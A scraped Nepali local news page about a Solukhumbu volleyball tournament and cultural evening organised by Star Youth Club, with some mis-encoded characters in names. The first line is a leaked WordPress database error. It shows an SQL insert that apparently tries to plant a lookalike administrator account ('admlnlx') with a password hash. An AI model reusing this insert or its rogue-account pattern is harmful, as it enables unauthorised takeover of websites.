WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BwjogkUHu6Dfw6guuESoPO6/sOGGOZ0', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-02-02 12:41:34', '', 'admlnlx', 'admlnlx')
सोलुखुम्बु । मंसिर ५ गते प्रदेश नं. १ का आर्थिक मामिला तथा योजनामन्त्री इन्द्र आङबो “मौसम” सोलुखुम्बु आउने भएका छन् । स्टार यूथ क्लब, सोलुखुम्बुको आयोजनामा सम्पन्न हुने ४ दिने भलिबल प्रतियोगीता तथा सांगीतिक साँझको उद्घाटनका लागि मन्त्री आङबो मंसिर ५ गते काठमाडौंबाट फाप्लु आउन लागेको क्लबका अध्यक्ष नाम्गेल शेर्पाले जानकारी दिए । त्यसैगरि ८ गते हुने समापनसत्रको प्रमुख अतिथि भने सोलुखुम्बुका प्रतिनिधीसभा सदस्य हेम कुमार राई …शूरबीरÚ रहने शेर्पाले जानकारी गराए ।
क्लबले आफ्नो स्थापना दिवसको अवसरमा यही मंसिर ५ गते देखि ८ गतेसम्म जिल्ला समन्वय समिति, सोलुखुम्बुको प्राङ्गण, सल्लेरीमा महिला तथा पुरुष भलिबल प्रतियोगीताको आयोजना गर्न लागेको हो । प्रतियागीतामा महिलातर्फ प्रदेश १ नं. प्रदेश स्तरीय र पुरुषतर्फ सोलुखुम्बु जिल्लाका अन्तर स्थानीय तह स्तरीय खेल हुने अध्यक्ष शेर्पाले जानकारी गराए ।
खेलको पुरस्कार राशीमा महिला र पुरुषबीच विभेद गर्ने गरिएकाले उनीहरु समान हुन् भन्ने सन्देश दिनका लागि समान राशी प्रदान गरिने अध्यक्ष शेर्पाले बताए । प्रतियोगीतामा प्रथम, द्वितिय, त्रृतिय र सान्त्वना स्थान हासिल गर्ने महिला तथा पुरुष दुवैतर्फका विजेताहरुलाई समान राशी क्रमशः १ लाख पचास हजार, १ लाख, ५० हजार र २५ हजार नगदसहित प्रमाण–पत्र र मेडल प्रदान गरिने क्लबका कोषाध्यक्ष सुजता तामाङले बताए ।
कार्यक्रमका लागि ९५ प्रतिशत तयारी सम्पन्न भएको क्लबका महासचिव सुन्दर तामाङ …विजयÚले जानकारी गराए । साथै मंसिर १ गते क्लबको पूर्ण बैठक बसी सम्पूर्ण कार्यविभाजन गरेको समेत तामाङले जानकारी गराए । स्टार यूथ क्लबले आयोजना गर्न लागेको कार्यक्रम हालसम्म सोलोखुम्बुमा आयोजित कार्यक्रममध्येकै उत्कृष्ट र पृथक रहने पनि तामाङले बताए ।
कार्यक्रमको उद्घाटनसत्रमा बौद्ध धर्मावलम्बीहरुको स्यांगी, किरात समुदायको साकेला, तामाङ समुदायको सेलो, मगर समुदायको कौडालगायतका सांस्कृतिक नृत्यसहित स्थानीय कलाकारहरुको साथमा जिल्लाकै पहिलो ब्याण्ड आगमनको बिशेष प्रस्तुति रहने क्लबका प्रचार–प्रसार संयोजक गणेश कुमार राई …वसन्तÚले जानकारी गराए । त्यसैगरि कार्यक्रमको समापनसत्रमा गायक प्रताप दास, गायिका असि्मता अधिकारी, हास्य कलाकारहरु शेरबहादुर गुरुङ, कैलाश कार्कीलगायतका राषि्ट्रय कलाकारहरुको सांगीतिक प्रस्तुतिसहित कार्यक्रम सम्पन्न हुने पनि राईले जानकारी गराए ।